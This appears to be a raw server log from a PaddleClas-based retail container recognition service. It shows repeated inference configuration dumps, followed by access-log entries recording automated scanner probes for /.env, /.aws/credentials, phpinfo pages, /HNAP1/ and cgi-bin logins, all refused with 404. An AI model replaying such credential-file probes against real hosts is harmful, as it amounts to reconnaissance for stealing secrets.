+=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:17:15 INFO: DetPostProcess : +2022-02-14 09:17:15 INFO: DetPreProcess : +2022-02-14 09:17:15 INFO: transform_ops : +2022-02-14 09:17:15 INFO: DetResize : +2022-02-14 09:17:15 INFO: interp : 2 +2022-02-14 09:17:15 INFO: keep_ratio : False +2022-02-14 09:17:15 INFO: target_size : [640, 640] +2022-02-14 09:17:15 INFO: DetNormalizeImage : +2022-02-14 09:17:15 INFO: is_scale : True +2022-02-14 09:17:15 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:15 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:15 INFO: DetPermute : +2022-02-14 09:17:15 INFO: Global : +2022-02-14 09:17:15 INFO: batch_size : 1 +2022-02-14 09:17:15 INFO: cpu_num_threads : 1 +2022-02-14 09:17:15 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:17:15 INFO: enable_benchmark : True +2022-02-14 09:17:15 INFO: enable_mkldnn : True +2022-02-14 09:17:15 INFO: enable_profile : False +2022-02-14 09:17:15 INFO: gpu_mem : 8000 +2022-02-14 09:17:15 INFO: image_shape : [3, 640, 640] +2022-02-14 09:17:15 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:17:15 INFO: ir_optim : True +2022-02-14 09:17:15 INFO: labe_list : ['foreground'] +2022-02-14 09:17:15 INFO: max_det_results : 5 +2022-02-14 09:17:15 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:17:15 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:17:15 INFO: threshold : 0.2 +2022-02-14 09:17:15 INFO: use_fp16 : False +2022-02-14 09:17:15 INFO: use_gpu : False +2022-02-14 09:17:15 INFO: use_tensorrt : False +2022-02-14 09:17:15 INFO: IndexProcess : +2022-02-14 09:17:15 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:17:15 INFO: return_k : 5 +2022-02-14 09:17:15 INFO: score_thres : 0.5 +2022-02-14 09:17:15 INFO: RecPostProcess : None +2022-02-14 09:17:15 INFO: RecPreProcess : +2022-02-14 09:17:15 INFO: transform_ops : +2022-02-14 09:17:15 INFO: ResizeImage : +2022-02-14 09:17:15 INFO: size : 224 +2022-02-14 09:17:15 INFO: NormalizeImage : +2022-02-14 09:17:15 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:15 INFO: order : +2022-02-14 09:17:15 INFO: scale : 0.00392157 +2022-02-14 09:17:15 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:15 INFO: ToCHWImage : None +Inference: 379.1394233703613 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1151/1353] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 09:17:14 2022] POST /reference_client/ => generated 98 bytes in 3055 msecs (HTTP/1.1 200) 5 headers in 157 bytes (21 switches on core 0) +req +2022-02-14 09:17:25 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:17:25 INFO: DetPostProcess : +2022-02-14 09:17:25 INFO: DetPreProcess : +2022-02-14 09:17:25 INFO: transform_ops : +2022-02-14 09:17:25 INFO: DetResize : +2022-02-14 09:17:25 INFO: interp : 2 +2022-02-14 09:17:25 INFO: keep_ratio : False +2022-02-14 09:17:25 INFO: target_size : [640, 640] +2022-02-14 09:17:25 INFO: DetNormalizeImage : +2022-02-14 09:17:25 INFO: is_scale : True +2022-02-14 09:17:25 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:25 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:25 INFO: DetPermute : +2022-02-14 09:17:25 INFO: Global : +2022-02-14 09:17:25 INFO: batch_size : 1 +2022-02-14 09:17:25 INFO: cpu_num_threads : 1 +2022-02-14 09:17:25 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:17:25 INFO: enable_benchmark : True +2022-02-14 09:17:25 INFO: enable_mkldnn : True +2022-02-14 09:17:25 INFO: enable_profile : False +2022-02-14 09:17:25 INFO: gpu_mem : 8000 +2022-02-14 09:17:25 INFO: image_shape : [3, 640, 640] +2022-02-14 09:17:25 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:17:25 INFO: ir_optim : True +2022-02-14 09:17:25 INFO: labe_list : ['foreground'] +2022-02-14 09:17:25 INFO: max_det_results : 5 +2022-02-14 09:17:25 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:17:25 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:17:25 INFO: threshold : 0.2 +2022-02-14 09:17:25 INFO: use_fp16 : False +2022-02-14 09:17:25 INFO: use_gpu : False +2022-02-14 09:17:25 INFO: use_tensorrt : False +2022-02-14 09:17:25 INFO: IndexProcess : +2022-02-14 09:17:25 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:17:25 INFO: return_k : 5 +2022-02-14 09:17:25 INFO: score_thres : 0.5 +2022-02-14 09:17:25 INFO: RecPostProcess : None +2022-02-14 09:17:25 INFO: RecPreProcess : +2022-02-14 09:17:25 INFO: transform_ops : +2022-02-14 09:17:25 INFO: ResizeImage : +2022-02-14 09:17:25 INFO: size : 224 +2022-02-14 09:17:25 INFO: NormalizeImage : +2022-02-14 09:17:25 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:25 INFO: order : +2022-02-14 09:17:25 INFO: scale : 0.00392157 +2022-02-14 09:17:25 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:25 INFO: ToCHWImage : None +Inference: 375.52452087402344 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1152/1354] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 09:17:24 2022] POST /reference_client/ => generated 98 bytes in 2924 msecs (HTTP/1.1 200) 5 headers in 157 bytes (14 switches on core 0) +req +2022-02-14 09:17:33 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:17:33 INFO: DetPostProcess : +2022-02-14 09:17:33 INFO: DetPreProcess : +2022-02-14 09:17:33 INFO: transform_ops : +2022-02-14 09:17:33 INFO: DetResize : +2022-02-14 09:17:33 INFO: interp : 2 +2022-02-14 09:17:33 INFO: keep_ratio : False +2022-02-14 09:17:33 INFO: target_size : [640, 640] +2022-02-14 09:17:33 INFO: DetNormalizeImage : +2022-02-14 09:17:33 INFO: is_scale : True +2022-02-14 09:17:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:33 INFO: DetPermute : +2022-02-14 09:17:33 INFO: Global : +2022-02-14 09:17:33 INFO: batch_size : 1 +2022-02-14 09:17:33 INFO: cpu_num_threads : 1 +2022-02-14 09:17:33 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:17:33 INFO: enable_benchmark : True +2022-02-14 09:17:33 INFO: enable_mkldnn : True +2022-02-14 09:17:33 INFO: enable_profile : False +2022-02-14 09:17:33 INFO: gpu_mem : 8000 +2022-02-14 09:17:33 INFO: image_shape : [3, 640, 640] +2022-02-14 09:17:33 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:17:33 INFO: ir_optim : True +2022-02-14 09:17:33 INFO: labe_list : ['foreground'] +2022-02-14 09:17:33 INFO: max_det_results : 5 +2022-02-14 09:17:33 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:17:33 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:17:33 INFO: threshold : 0.2 +2022-02-14 09:17:33 INFO: use_fp16 : False +2022-02-14 09:17:33 INFO: use_gpu : False +2022-02-14 09:17:33 INFO: use_tensorrt : False +2022-02-14 09:17:33 INFO: IndexProcess : +2022-02-14 09:17:33 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:17:33 INFO: return_k : 5 +2022-02-14 09:17:33 INFO: score_thres : 0.5 +2022-02-14 09:17:33 INFO: RecPostProcess : None +2022-02-14 09:17:33 INFO: RecPreProcess : +2022-02-14 09:17:33 INFO: transform_ops : +2022-02-14 09:17:33 INFO: ResizeImage : +2022-02-14 09:17:33 INFO: size : 224 +2022-02-14 09:17:33 INFO: NormalizeImage : +2022-02-14 09:17:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:33 INFO: order : +2022-02-14 09:17:33 INFO: scale : 0.00392157 +2022-02-14 09:17:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:33 INFO: ToCHWImage : None +Inference: 373.5072612762451 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1153/1355] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 09:17:32 2022] POST /reference_client/ => generated 98 bytes in 2972 msecs (HTTP/1.1 200) 5 headers in 157 bytes (22 switches on core 0) +req +2022-02-14 09:17:42 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:17:42 INFO: DetPostProcess : +2022-02-14 09:17:42 INFO: DetPreProcess : +2022-02-14 09:17:42 INFO: transform_ops : +2022-02-14 09:17:42 INFO: DetResize : +2022-02-14 09:17:42 INFO: interp : 2 +2022-02-14 09:17:42 INFO: keep_ratio : False +2022-02-14 09:17:42 INFO: target_size : [640, 640] +2022-02-14 09:17:42 INFO: DetNormalizeImage : +2022-02-14 09:17:42 INFO: is_scale : True +2022-02-14 09:17:42 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:42 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:42 INFO: DetPermute : +2022-02-14 09:17:42 INFO: Global : +2022-02-14 09:17:42 INFO: batch_size : 1 +2022-02-14 09:17:42 INFO: cpu_num_threads : 1 +2022-02-14 09:17:42 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:17:42 INFO: enable_benchmark : True +2022-02-14 09:17:42 INFO: enable_mkldnn : True +2022-02-14 09:17:42 INFO: enable_profile : False +2022-02-14 09:17:42 INFO: gpu_mem : 8000 +2022-02-14 09:17:42 INFO: image_shape : [3, 640, 640] +2022-02-14 09:17:42 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:17:42 INFO: ir_optim : True +2022-02-14 09:17:42 INFO: labe_list : ['foreground'] +2022-02-14 09:17:42 INFO: max_det_results : 5 +2022-02-14 09:17:42 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:17:42 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:17:42 INFO: threshold : 0.2 +2022-02-14 09:17:42 INFO: use_fp16 : False +2022-02-14 09:17:42 INFO: use_gpu : False +2022-02-14 09:17:42 INFO: use_tensorrt : False +2022-02-14 09:17:42 INFO: IndexProcess : +2022-02-14 09:17:42 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:17:42 INFO: return_k : 5 +2022-02-14 09:17:42 INFO: score_thres : 0.5 +2022-02-14 09:17:42 INFO: RecPostProcess : None +2022-02-14 09:17:42 INFO: RecPreProcess : +2022-02-14 09:17:42 INFO: transform_ops : +2022-02-14 09:17:42 INFO: ResizeImage : +2022-02-14 09:17:42 INFO: size : 224 +2022-02-14 09:17:42 INFO: NormalizeImage : +2022-02-14 09:17:42 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:17:42 INFO: order : +2022-02-14 09:17:42 INFO: scale : 0.00392157 +2022-02-14 09:17:42 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:17:42 INFO: ToCHWImage : None +Inference: 372.1733093261719 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1154/1356] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 09:17:41 2022] POST /reference_client/ => generated 98 bytes in 2873 msecs (HTTP/1.1 200) 5 headers in 157 bytes (20 switches on core 0) +[pid: 19148|app: 0|req: 1155/1357] 223.167.141.7 () {38 vars in 791 bytes} [Mon Feb 14 09:20:19 2022] GET /reference_client/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1156/1358] 164.90.197.24 () {36 vars in 481 bytes} [Mon Feb 14 10:39:03 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1157/1359] 84.22.3.25 () {32 vars in 460 bytes} [Mon Feb 14 10:52:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1158/1360] 23.251.102.74 () {34 vars in 497 bytes} [Mon Feb 14 10:55:37 2022] GET /solr/ => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1159/1361] 83.97.20.34 () {30 vars in 328 bytes} [Mon Feb 14 11:30:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1160/1362] 34.140.248.32 () {42 vars in 562 bytes} [Mon Feb 14 11:34:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1161/1363] 185.142.236.35 () {34 vars in 537 bytes} [Mon Feb 14 12:17:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1162/1364] 185.142.236.35 () {30 vars in 360 bytes} [Mon Feb 14 12:17:31 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1163/1365] 185.142.236.35 () {30 vars in 362 bytes} [Mon Feb 14 12:17:32 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1164/1366] 185.142.236.35 () {30 vars in 388 bytes} [Mon Feb 14 12:17:33 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1165/1367] 185.142.236.35 () {36 vars in 515 bytes} [Mon Feb 14 12:17:34 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1166/1368] 83.97.20.34 () {26 vars in 286 bytes} [Mon Feb 14 12:56:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1167/1369] 20.151.201.9 () {36 vars in 499 bytes} [Mon Feb 14 13:25:21 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1168/1370] 162.142.125.219 () {28 vars in 312 bytes} [Mon Feb 14 13:43:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1169/1371] 162.142.125.219 () {34 vars in 444 bytes} [Mon Feb 14 13:43:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 93/1372] 107.189.10.196 () {28 vars in 311 bytes} [Mon Feb 14 13:50:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1170/1373] 107.189.10.196 () {40 vars in 673 bytes} [Mon Feb 14 13:50:49 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1171/1374] 103.135.38.34 () {32 vars in 464 bytes} [Mon Feb 14 14:15:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1172/1375] 36.94.190.37 () {32 vars in 462 bytes} [Mon Feb 14 16:14:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1173/1376] 83.97.20.34 () {30 vars in 328 bytes} [Mon Feb 14 16:56:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1174/1377] 142.147.99.155 () {36 vars in 524 bytes} [Mon Feb 14 17:08:50 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1175/1378] 142.147.99.155 () {40 vars in 631 bytes} [Mon Feb 14 17:08:51 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1176/1379] 142.147.99.155 () {36 vars in 524 bytes} [Mon Feb 14 17:16:15 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1177/1380] 142.147.99.155 () {40 vars in 631 bytes} [Mon Feb 14 17:16:19 2022] POST / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1178/1381] 107.189.10.196 () {28 vars in 311 bytes} [Mon Feb 14 17:29:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1179/1382] 107.189.10.196 () {40 vars in 673 bytes} [Mon Feb 14 17:29:22 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1180/1383] 83.143.86.62 () {34 vars in 436 bytes} [Mon Feb 14 17:33:29 2022] GET /cgi-bin/check_auth.cgi => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1181/1384] 83.143.86.62 () {34 vars in 408 bytes} [Mon Feb 14 17:33:30 2022] GET /wp-admin => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1182/1385] 83.143.86.62 () {34 vars in 426 bytes} [Mon Feb 14 17:33:30 2022] GET /cgi-bin/login.cgi => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1183/1386] 83.143.86.62 () {34 vars in 424 bytes} [Mon Feb 14 17:33:32 2022] GET /cgi-bin/main.cgi => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1184/1387] 83.143.86.62 () {34 vars in 428 bytes} [Mon Feb 14 17:33:33 2022] GET /cgi-bin/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1185/1388] 20.188.111.10 () {36 vars in 427 bytes} [Mon Feb 14 17:56:09 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1186/1389] 183.136.225.56 () {34 vars in 456 bytes} [Mon Feb 14 18:22:07 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1187/1390] 13.229.89.192 () {42 vars in 791 bytes} [Mon Feb 14 18:43:13 2022] GET /_profiler/phpinfo => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1188/1391] 13.229.89.192 () {42 vars in 779 bytes} [Mon Feb 14 18:43:14 2022] GET /phpinfo.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1189/1392] 13.229.89.192 () {42 vars in 771 bytes} [Mon Feb 14 18:43:14 2022] GET /phpinfo => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1190/1393] 13.229.89.192 () {42 vars in 771 bytes} [Mon Feb 14 18:43:14 2022] GET /aws.yml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1191/1394] 13.229.89.192 () {42 vars in 773 bytes} [Mon Feb 14 18:43:14 2022] GET /.env.bak => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1192/1395] 13.229.89.192 () {42 vars in 773 bytes} [Mon Feb 14 18:43:14 2022] GET /info.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1193/1396] 13.229.89.192 () {42 vars in 789 bytes} [Mon Feb 14 18:43:14 2022] GET /.aws/credentials => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1194/1397] 13.229.89.192 () {42 vars in 757 bytes} [Mon Feb 14 18:43:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1195/1398] 13.229.89.192 () {42 vars in 785 bytes} [Mon Feb 14 18:43:15 2022] GET /config/aws.yml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1196/1399] 13.229.89.192 () {46 vars in 871 bytes} [Mon Feb 14 18:43:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 19/1400] 13.229.89.192 () {42 vars in 775 bytes} [Mon Feb 14 18:43:15 2022] GET /config.js => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1197/1401] 83.97.20.34 () {26 vars in 286 bytes} [Mon Feb 14 18:50:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1198/1402] 167.248.133.63 () {30 vars in 401 bytes} [Mon Feb 14 19:44:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1199/1403] 167.248.133.63 () {22 vars in 235 bytes} [Mon Feb 14 19:44:47 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1200/1404] 62.171.150.168 () {28 vars in 311 bytes} [Mon Feb 14 20:27:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1201/1405] 62.171.150.168 () {40 vars in 678 bytes} [Mon Feb 14 20:27:50 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1202/1406] 81.100.96.230 () {30 vars in 436 bytes} [Mon Feb 14 21:51:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1203/1407] 23.99.198.33 () {36 vars in 588 bytes} [Mon Feb 14 23:02:33 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 94/1408] 23.99.198.33 () {40 vars in 695 bytes} [Mon Feb 14 23:02:34 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 95/1409] 83.97.20.34 () {30 vars in 329 bytes} [Mon Feb 14 23:03:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1204/1410] 40.117.75.44 () {36 vars in 522 bytes} [Mon Feb 14 23:33:36 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1205/1411] 40.117.75.44 () {40 vars in 629 bytes} [Mon Feb 14 23:33:37 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1206/1412] 2.58.149.136 () {40 vars in 566 bytes} [Tue Feb 15 00:14:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1207/1413] 192.241.210.212 () {34 vars in 395 bytes} [Tue Feb 15 00:23:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1208/1414] 209.17.96.26 () {30 vars in 409 bytes} [Tue Feb 15 00:32:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1209/1415] 83.97.20.34 () {26 vars in 287 bytes} [Tue Feb 15 01:01:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1210/1416] 109.237.96.50 () {28 vars in 310 bytes} [Tue Feb 15 01:03:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1211/1417] 162.142.125.221 () {30 vars in 402 bytes} [Tue Feb 15 01:28:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1212/1418] 162.142.125.221 () {22 vars in 235 bytes} [Tue Feb 15 01:28:33 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1213/1419] 106.15.202.168 () {34 vars in 460 bytes} [Tue Feb 15 01:39:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1214/1420] 128.14.134.170 () {34 vars in 488 bytes} [Tue Feb 15 02:22:09 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1215/1421] 185.180.143.8 () {30 vars in 446 bytes} [Tue Feb 15 03:03:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1216/1422] 185.180.143.8 () {30 vars in 470 bytes} [Tue Feb 15 03:03:37 2022] GET /showLogin.cc => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1217/1423] 20.55.53.144 () {34 vars in 549 bytes} [Tue Feb 15 03:31:00 2022] GET /k65LQW0vDRbNroh3IUYOgfzyxEg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1218/1424] 139.162.145.250 () {34 vars in 445 bytes} [Tue Feb 15 03:47:25 2022] GET /bag2 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1219/1425] 47.102.104.161 () {34 vars in 503 bytes} [Tue Feb 15 04:35:54 2022] 